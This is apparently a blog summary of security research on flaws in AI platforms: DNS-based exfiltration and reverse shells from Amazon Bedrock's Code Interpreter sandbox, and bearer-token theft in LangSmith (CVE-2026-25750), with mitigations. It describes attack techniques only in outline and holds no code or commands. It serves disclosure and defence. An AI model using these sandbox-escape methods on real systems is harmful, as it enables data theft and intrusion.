top of page

AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE

  • Mar 17
  • 2 min read

Key Findings


* Amazon Bedrock AgentCore Code Interpreter enables DNS-based data exfiltration and RCE


* LangSmith vulnerable to token theft via URL parameter injection (CVE-2026-25750)


* Sandbox mode in AI services can be exploited to bypass network isolation


* Potential for unauthorized data access and command execution across multiple platforms


Background


BeyondTrust cybersecurity researchers discovered critical vulnerabilities in AI execution environments that compromise network isolation and data security. The research highlights systemic weaknesses in how AI platforms manage sandboxed code execution and user authentication.


Amazon Bedrock Vulnerability


The core issue involves Amazon Bedrock's Code Interpreter allowing outbound DNS queries despite "no network access" configuration. Key attack vectors include:


* Establishing bidirectional communication channels via DNS


* Obtaining interactive reverse shells


* Exfiltrating sensitive information through DNS queries


* Executing commands by polling DNS A records


Researchers demonstrated that an overprivileged IAM role could grant broad access to AWS resources, substantially increasing potential damage.


LangSmith Token Theft Vulnerability


Miggo Security disclosed a high-severity flaw (CVE-2026-25750) characterized by:


* URL parameter injection in baseUrl parameter


* Potential for stealing user bearer tokens


* Compromise possible through social engineering


* Affects both cloud and self-hosted deployments


Mitigation Recommendations


* Migrate critical workloads from sandbox to VPC mode


* Implement DNS firewalls


* Audit IAM role permissions


* Use least privilege principles


* Update to latest platform versions


Potential Impact


Successful exploitation could result in:


* Unauthorized data access


* Infrastructure compromise


* Sensitive information disclosure


* Remote code execution


* Potential service disruption


Conclusion


These vulnerabilities underscore the evolving security challenges in AI platforms, emphasizing the need for rigorous security testing and continuous monitoring of emerging technologies.


Sources


  • https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html

  • https://www.socdefenders.ai/item/64c7c544-2272-44a9-8f9b-3a6501982332

  • https://x.com/shah_sheikh/status/2033962268841349510

  • https://x.com/shah_sheikh/status/2033961630304973055

  • https://www.facebook.com/thehackernews/photos/-amazon-bedrock-langsmith-and-sglang-flaws-expose-data-leaks-token-theft-and-rce/1319898513508062/

Recent Posts

See All

Comments


  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page